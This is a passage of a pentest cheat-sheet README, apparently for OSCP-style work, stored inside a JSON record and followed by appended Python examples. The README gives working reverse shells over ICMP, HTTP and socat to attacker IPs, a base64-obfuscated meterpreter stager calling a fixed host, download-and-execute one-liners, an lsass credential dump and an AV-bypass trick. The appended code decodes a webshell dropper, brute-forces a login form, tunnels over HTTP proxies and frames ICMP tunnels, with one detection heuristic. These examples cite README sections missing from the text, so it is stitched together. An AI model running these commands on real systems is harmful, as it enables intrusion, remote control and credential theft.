\u003c/pre\u003e\n\n\n![dns](https://user-images.githubusercontent.com/7115563/35040679-5a155bfa-fb82-11e7-98ec-ba015e3ad69c.png)\n\nReference: https://github.com/l_ukebaggett/dnscat2-powershell\n\n\n\u003ca name=\"icmp\"\u003e\u003c/a\u003e\u003ch3\u003e Reverse ICMP shell 
\u003c/h3\u003e\n\n\u003cb\u003e Server \u003c/b\u003e\n\n\u003cpre\u003e\n# stop the kernel from answering echo requests itself so icmpsh_m.py can reply with the next command\nsysctl -w net.ipv4.icmp_echo_ignore_all=1\npython icmpsh_m.py [attacker IP] [victim IP]\n\u003c/pre\u003e\n\n\u003cb\u003e Client \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [attacker IP]\u003c/pre\u003e\n\n![icmpreverseshell](https://user-images.githubusercontent.com/7115563/35213289-6ac51b00-ff5d-11e7-9b66-766af2aaf92e.png)\n\n\u003cb\u003e Native ICMP shell \u003c/b\u003e\n\n\u003cpre\u003e \npowershell -nop -Command \"$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}\"\n\u003c/pre\u003e\n\nReference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/\n\n\n\u003ca name=\"httpproxy\"\u003e\u003c/a\u003e\u003ch3\u003e Reverse HTTP Shell through Proxy \u003c/h3\u003e\n\n\u003cpre\u003euse payload/python/meterpreter/reverse_http\u003c/pre\u003e\n\n![proxy2](https://user-images.githubusercontent.com/7115563/33836652-3d9c9624-de8a-11e7-9869-e18c5a28ebd7.png)\n\n\n```python -c \"import base64,sys;exec(base64.b64decode({2:str,3:lambda 
b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))\"```\n\nFinally we set up the handler:\n\n![proxy3](https://user-images.githubusercontent.com/7115563/33836552-fd3204ac-de89-11e7-940c-71c8ab321bf7.png)\n\n\n\u003ca name=\"misc\"\u003e\u003c/a\u003e\u003ch2\u003e Miscellaneous \u003c/h2\u003e\n\n\u003ca name=\"interactiveshell\"\u003e\u003c/a\u003e\u003ch3\u003e Interactive Reverse Shell \u003c/h3\u003e\n\n\u003cb\u003e Method 1 \u003c/b\u003e\n\nAttacker:\n\n```socat file:`tty`,raw,echo=0 TCP-L:4444```\n\nVictim:\n\n```wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444```\n\nSocat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat\n\n\u003cb\u003e Method 2 \u003c/b\u003e\n\nIn reverse shell\n\n\u003cpre\u003e\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nCtrl-Z\n\u003c/pre\u003e\n\nIn kali\n\n\u003cpre\u003e\necho $TERM\nstty -a\nstty raw -echo\nfg\n\u003c/pre\u003e\n\nIn reverse shell\n\n\u003cpre\u003e\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty rows \u003cnum\u003e columns \u003ccols\u003e\nbash\n\u003c/pre\u003e\n\n\n\u003ca name=\"jailescape\"\u003e\u003c/a\u003e\u003ch3\u003erbash Jail Escape\u003c/h3\u003e\n\n\u003cb\u003eRequestTTY no\u003c/b\u003e\n\n\u003cpre\u003essh -o RequestTTY=no 
user@ip\u003c/pre\u003e\n\n![ttyno](https://user-images.githubusercontent.com/7115563/45673768-dec15480-bb2b-11e8-9d50-513c925b359b.png)\n\nand the result would be:\n\n![ttyfalse2](https://user-images.githubusercontent.com/7115563/45673773-e254db80-bb2b-11e8-911a-f0dec70936f4.png)\n\n\u003cb\u003eBash --noprofile\u003c/b\u003e\n\n\u003cpre\u003essh monitor@127.0.0.1 -t \"bash --noprofile\" \u003c/pre\u003e\n\n![bashnoprofile](https://user-images.githubusercontent.com/7115563/45673871-1defa580-bb2c-11e8-8004-c924ad0ddb56.png)\n\n\n\u003ca name=\"windowstransfer\"\u003e\u003c/a\u003e\u003ch3\u003e Windows File Transfer \u003c/h3\u003e\n\n\u003cb\u003ebitsadmin\u003c/b\u003e\n\n`bitsadmin /transfer debjob /download /priority normal http://\u003cip\u003e/shell.php c:\\xampp\\htdocs\\shell.php`\n\n\u003cb\u003ecscript wget.vbs (code on the repo)\u003c/b\u003e\n\n`cscript wget.vbs http://\u003cip\u003e/test.txt test.txt`\n\n\u003cb\u003epowershell\u003c/b\u003e\n\n`powershell -c \"(new-object System.Net.WebClient).Downloadfile('http://\u003cip\u003e/exploit.exe', 'C:\\Windows\\temp\\exploit.txt')\"`\n\n\u003cb\u003eftp\u003c/b\u003e\n\nclient:\n\n\u003cpre\u003e\necho open [ip] [port] \u003e ftpscript.txt\necho anonymous\u003e\u003e ftpscript.txt\necho PASS \u003e\u003e ftpscript.txt\necho bin \u003e\u003e ftpscript.txt\necho get meter.exe\u003e\u003e ftpscript.txt\necho quit \u003e\u003e ftpscript.txt\nftp -s:ftpscript.txt\n\u003c/pre\u003e\n\nserver:\n\n\u003ccode\u003epython -m pyftpdlib  --port=2121 --write\u003c/code\u003e\n\n\u003cb\u003ewget.exe\u003c/b\u003e\n\nUpload to vulnerable server from kali: ` /usr/share/windows-binaries/wget.exe`\n\n`wget.exe http://\u003cip\u003e/file file`\n\n\u003cb\u003e certutil \u003c/b\u003e\n\n`certutil -urlcache -split -f  https://\u003cip\u003e/file.txt file.txt`\n  \n\u003ca name=\"vpnrestrict\"\u003e\u003c/a\u003e\u003ch3\u003e Bypass VPN routing restrictions \u003c/h3\u003e\n\n\u003cpre\u003eopenconnect vpnXXX02.XXXX.com -u 
XX -s 'vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68'\u003c/pre\u003e\n\n![vpn1](https://user-images.githubusercontent.com/7115563/41146909-30e484de-6b05-11e8-82fb-acfc17a722a2.png)\n\nReference: https://github.com/dlenski/vpn-slice\n\n\u003ca name=\"avbypass\"\u003e\u003c/a\u003e\u003ch3\u003eAV Bypass\u003c/h3\u003e\n\n\u003cb\u003e Lsass Dump \u003c/b\u003e\n\n\u003cpre\u003e\n\ncertutil.exe -urlcache -f https://raw.githubusercontent.com/adon90/pentest_compilation/master/PostExplotation/mimi.vbs C:\\Windows\\temp\\mimi.vbs\n\ncscript mimi.vbs lsass.exe\n\npypykatz lsa minidump lsass.bin | tee -a dump1.txt \n\n\u003c/pre\u003e\n\nReferences: https://esmyl.medium.com/windows-memory-dump-cheat-sheet-23f32079304a\n\n\u003cb\u003e SharpSploit \u003c/b\u003e\n\n\u003cpre\u003e\nStart-Process \"powershell\" \"unblock-file .\\SharpSploit.dll\"\n\nAdd-Type -Path .\\SharpSploit.dll\n\n[SharpSploit.Execution.Shell]::ShellExecute(\"regsvr32 /s /n /u /i:http://192.168.48.151:9999/QuHBoZ.sct scrobj.dll\")\n\u003c/pre\u003e\n\n![sharpsploit](https://user-images.githubusercontent.com/7115563/46204073-2c07a800-c31c-11e8-9905-76c168432018.png)\n\nReferences: https://cobbr.io/SharpSploit.html\n\n\u003cb\u003e Workflow.Compiler \u003c/b\u003e\n\n\u003cpre\u003e C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe test.xml results.xml \u003c/pre\u003e\n\n![workflow](https://user-images.githubusercontent.com/7115563/46660701-e79bc800-cbb7-11e8-8e07-49615b17d258.png)\n\nReferences:\n\nhttps://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C\nhttps://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb\n\n\n\n\n\n","funding_links":[],"categories":["XSLT (3)","XSLT","\u003ca id=\"e97d183e67fa3f530e7d0e7e8c33ee62\"\u003e\u003c/a\u003eUncategorized","Resources","\u003ca id=\"13d067316e9894cc40fe55178ee40f24\"\u003e\u003c/a\u003eOSCP","Pentesting","Programming/Comp Sci/SE 
Things"],"sub_categories":["\u003ca id=\"f110da0bf67359d3abc62b27d717e55e\"\u003e\u003c/a\u003eNewly added","Cheatsheets and Scripts","\u003ca id=\"f2c76d99a0b1fda124d210bd1bbc8f3f\"\u003e\u003c/a\u003eWordlist generation","ARM","Worth Looking At"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadon90%2Fpentest_compilation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fadon90%2Fpentest_compilation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadon90%2Fpentest_compilation/lists"}
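Worked example for the "file upload evasion: rot13 + urlencode" trick in the PHP RCE section of the README above. This is an added example, not code from the adon90/pentest_compilation repository: it reproduces the dropper's encoding in Python, decodes the exact payload string the README uses, and runs both forms past a naive substring filter. The signature list and the target path are constructed for the demo and stand in for whatever a real upload filter greps for.

```python
import codecs
from urllib.parse import quote, unquote

# The encoded payload exactly as it appears in the README's dropper.
README_PAYLOAD = "%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"

# Constructed stand-in for a naive upload filter that greps for webshell markers.
NAIVE_SIGNATURES = ("system(", "shell_exec(", "passthru(", "$_GET[", "$_POST[", "$_REQUEST[")


def encode_payload(php_source: str) -> str:
    """Attacker side, done offline: rot13 the PHP, then percent-encode every byte."""
    return quote(codecs.encode(php_source, "rot_13"), safe="")


def decode_payload(encoded: str) -> str:
    """Server side, what the dropper does: str_rot13(urldecode($payload))."""
    return codecs.encode(unquote(encoded), "rot_13")


def signature_hit(text: str) -> bool:
    """True if any webshell marker appears literally in the text."""
    return any(sig in text for sig in NAIVE_SIGNATURES)


def build_dropper(encoded: str, target_path: str) -> str:
    """Stage-1 PHP that writes the decoded shell to disk (mirrors the README line)."""
    return (
        "<?php $payload=\"" + encoded + "\"; "
        "file_put_contents('" + target_path + "', str_rot13(urldecode($payload))); ?>"
    )


if __name__ == "__main__":
    shell = decode_payload(README_PAYLOAD)
    dropper = build_dropper(README_PAYLOAD, "/var/www/html/uploads/test8.php")
    print("decoded shell :", shell)
    print("plain shell flagged :", signature_hit(shell))
    print("dropper flagged     :", signature_hit(dropper))
```

The dropper is still PHP, so a filter that rejects `<?php` outright still catches it; what the encoding defeats is content inspection for the dangerous calls (`system(`, `$_GET[`), which only reappear once PHP has run `str_rot13(urldecode(...))` on the server.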
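The hydra and wfuzz one-liners in the HTTP Brute Force section both hinge on one decision: how the tool tells a failed login from a successful one. hydra's third colon-separated field (`Moved Temporarily` in the README) names the failure response by default, while wfuzz's `--hc` hides responses by status code. The following added example, which is not part of the README, models that decision in Python against a constructed local login form that answers a failed POST with `302 Moved Temporarily`, as the hydra line expects. The form path, field names, valid credential pair and wordlist are all constructed for the demo.

```python
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode

# Constructed target: the only credential pair the fake /admin/index.php accepts.
VALID_CREDENTIALS = {"admin": "Winter2023!"}


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal stand-in for the README's /admin/index.php login form."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        password = form.get("password", [""])[0]
        if VALID_CREDENTIALS.get(user) == password:
            body = b"Welcome, admin"
            self.send_response(200)
        else:
            # Failed logins bounce back to the form: this is the marker hydra keys on.
            body = b""
            self.send_response(302, "Moved Temporarily")
            self.send_header("Location", "/admin/index.php?error=1")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def try_login(host, port, user, password):
    """One POST without following redirects; returns (status, reason)."""
    conn = HTTPConnection(host, port, timeout=5)
    conn.request(
        "POST", "/admin/index.php",
        body=urlencode({"user": user, "password": password}),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status, resp.reason


def brute_force(host, port, users, passwords, failure_marker="Moved Temporarily"):
    """hydra semantics: failure_marker names the FAILED response and anything
    else is reported as a hit. A marker that also occurs on success would
    silently hide the valid pair, so confirm it by hand before a long run."""
    hits = []
    for user in users:
        for password in passwords:
            status, reason = try_login(host, port, user, password)
            if failure_marker not in f"{status} {reason}":
                hits.append((user, password))
    return hits


def run_demo():
    """Start the fake form on an ephemeral loopback port and attack it."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    wordlist = ["password", "123456", "admin", "Winter2023!", "letmein"]  # constructed
    try:
        return brute_force(host, port, ["admin"], wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("valid credentials:", run_demo())
```

Run it with `python3 brute_demo.py`; it prints the one pair the fake form accepts. The same check is what `wfuzz --hc 302` would do by status code alone, which is why the README's wfuzz line hides 404s instead: look at one failed and one successful response in Burp first and pick the marker from what actually differs.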
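The socat `PROXY:`, proxytunnel, corkscrew and proxychains `http` entries in the "SSH over HTTP (Squid)" section all do the same thing: send an HTTP `CONNECT host:port` request to the proxy and, once a `200` comes back, use the socket as a raw TCP connection to the target. This added example, not part of the README, implements both sides of that exchange on loopback: a constructed stand-in for the internal sshd (banner plus echo) and a constructed stand-in for Squid that enforces the port ACL. Stock Squid only allows CONNECT to its `SSL_ports` ACL (443), which is the usual reason this trick fails against an unmodified proxy, so the demo shows the refused case too. Ports, banner and hostnames are all made up for the demo.

```python
import socket
import threading

CRLF = b"\r\n"


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _read_until(sock: socket.socket, buf: bytes, marker: bytes) -> bytes:
    while marker not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed the connection early")
        buf += chunk
    return buf


def fake_sshd(listener: socket.socket) -> None:
    """Constructed stand-in for the internal sshd: banner, echo one line, close."""
    try:
        conn, _ = listener.accept()
    except OSError:
        return
    with conn:
        conn.sendall(b"SSH-2.0-demo_sshd" + CRLF)
        conn.sendall(conn.recv(4096))


def fake_squid(listener: socket.socket, allowed_ports: set) -> None:
    """Constructed stand-in for Squid on :3128; allowed_ports models its SSL_ports ACL."""
    try:
        conn, _ = listener.accept()
    except OSError:
        return
    with conn:
        try:
            request = _read_until(conn, b"", CRLF + CRLF)
        except ConnectionError:
            return
        method, target = request.split(CRLF)[0].decode().split(" ")[:2]
        host, port = target.rsplit(":", 1)
        if method != "CONNECT" or int(port) not in allowed_ports:
            conn.sendall(b"HTTP/1.1 403 Forbidden" + CRLF + CRLF)
            return
        with socket.create_connection((host, int(port))) as upstream:
            conn.sendall(b"HTTP/1.1 200 Connection established" + CRLF + CRLF)
            back = threading.Thread(target=_pump, args=(upstream, conn))
            back.start()
            _pump(conn, upstream)
            back.join()


def ssh_over_http(proxy, host, port, line=b"hello" + CRLF, timeout=5.0):
    """Client side of socat PROXY: / proxytunnel / corkscrew. Returns (banner, echo)."""
    with socket.create_connection(proxy, timeout=timeout) as sock:
        sock.sendall(f"CONNECT {host}:{port} HTTP/1.1\r\nHost: {host}:{port}\r\n\r\n".encode())
        head, rest = _read_until(sock, b"", CRLF + CRLF).split(CRLF + CRLF, 1)
        status = head.split(CRLF)[0].decode(errors="replace")
        if not status.startswith("HTTP/1.1 200"):
            raise ConnectionError(f"CONNECT refused: {status}")
        # Everything after the blank line is the tunnelled TCP stream.
        banner, rest = _read_until(sock, rest, CRLF).split(CRLF, 1)
        sock.sendall(line)
        return banner.decode(), _read_until(sock, rest, line)


def _listener() -> socket.socket:
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(5)
    return srv


def run_demo(acl_allows_ssh: bool):
    """Run fake sshd and fake Squid on loopback and tunnel through the proxy.
    Raises ConnectionError when the proxy ACL does not allow the target port."""
    sshd_l, proxy_l = _listener(), _listener()
    ssh_port = sshd_l.getsockname()[1]
    allowed = {ssh_port} if acl_allows_ssh else {443}
    threading.Thread(target=fake_sshd, args=(sshd_l,), daemon=True).start()
    threading.Thread(target=fake_squid, args=(proxy_l, allowed), daemon=True).start()
    try:
        return ssh_over_http(proxy_l.getsockname(), "127.0.0.1", ssh_port)
    finally:
        sshd_l.close()
        proxy_l.close()
```

`run_demo(True)` returns the sshd banner and the echoed line; `run_demo(False)` raises with the proxy's `403`. When a real Squid refuses CONNECT to 22, the options are an sshd that listens on 443 (or another port in `SSL_ports`) or a different pivot such as the TCP-over-HTTP tools later in the README.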
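The icmpsh server, Invoke-PowerShellIcmp and the native one-liner in the "Reverse ICMP shell" section all move data the same way: command output rides in the payload of echo requests from the victim, and the next command rides in the payload of the echo reply the attacker sends back (which is why the README disables `icmp_echo_ignore_all` on the server: otherwise the kernel answers first with an empty reply). This added example, not part of the README, builds and parses those ICMP echo messages in Python with the RFC 1071 checksum, splits command output across sequence numbers, and adds a constructed detection heuristic that compares payloads against the fixed patterns stock ping tools send. It needs no raw sockets, so it runs unprivileged; the identifiers, output text and chunk sizes are made up for the demo.

```python
import struct

ICMP_ECHO_REQUEST = 8   # victim -> attacker: carries command output
ICMP_ECHO_REPLY = 0     # attacker -> victim: carries the next command
HEADER = "!BBHHH"       # type, code, checksum, identifier, sequence

# Payload Windows ping.exe sends (32 bytes). iputils ping on Linux sends a
# 16-byte timestamp followed by bytes whose value equals their offset.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def rfc1071_checksum(data: bytes) -> int:
    """Internet checksum: one's complement of the one's-complement 16-bit sum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP echo message with the checksum computed over header + payload."""
    header = struct.pack(HEADER, icmp_type, 0, 0, ident, seq)
    csum = rfc1071_checksum(header + payload)
    return struct.pack(HEADER, icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Verify the checksum (a valid message sums to zero) and split the fields."""
    if len(packet) < 8 or rfc1071_checksum(packet) != 0:
        raise ValueError("truncated ICMP message or bad checksum")
    icmp_type, code, _, ident, seq = struct.unpack(HEADER, packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq, "payload": packet[8:]}


def frame_output(output: bytes, ident: int, seq0: int, chunk: int = 1400) -> list:
    """Victim side: one echo request per chunk, consecutive sequence numbers.
    1400 keeps each datagram under a 1500-byte MTU (20 IP + 8 ICMP bytes)."""
    return [
        build_echo(ICMP_ECHO_REQUEST, ident, seq0 + i, output[off:off + chunk])
        for i, off in enumerate(range(0, len(output), chunk))
    ]


def reassemble(packets: list) -> bytes:
    """Attacker side: order by sequence number and concatenate the payloads."""
    parsed = sorted((parse_echo(p) for p in packets), key=lambda m: m["seq"])
    return b"".join(m["payload"] for m in parsed)


def linux_ping_payload(size: int = 56) -> bytes:
    """Shape of iputils ping data: 16-byte timestamp, then byte i == i & 0xFF."""
    return bytes(16) + bytes(i & 0xFF for i in range(16, size))


def looks_like_tunnel(payload: bytes) -> bool:
    """Constructed detection heuristic: stock ping tools send a fixed pattern,
    so an echo payload that matches neither deserves a closer look."""
    if payload == WINDOWS_PING_PAYLOAD:
        return False
    if len(payload) >= 24 and payload[16:] == bytes(i & 0xFF for i in range(16, len(payload))):
        return False
    return True


if __name__ == "__main__":
    frames = frame_output(b"uid=0(root) gid=0(root)\n", ident=0x1234, seq0=1, chunk=8)
    print(len(frames), "echo requests; reassembled:", reassemble(frames))
    print("shell payload flagged:", looks_like_tunnel(parse_echo(frames[0])["payload"]))
    print("stock ping flagged:   ", looks_like_tunnel(linux_ping_payload()))
```

Two practical notes follow from the framing. The native one-liner sets `DontFragment`, so a command whose output exceeds the path MTU minus the IP and ICMP headers cannot go out in a single reply; chunking as above (or trimming output with `| select -first N`) avoids that. On the defensive side, the heuristic here is deliberately simple: payload contents, sizes and request/reply ratios that do not match a known ping tool are what a NIDS rule for ICMP tunnelling keys on.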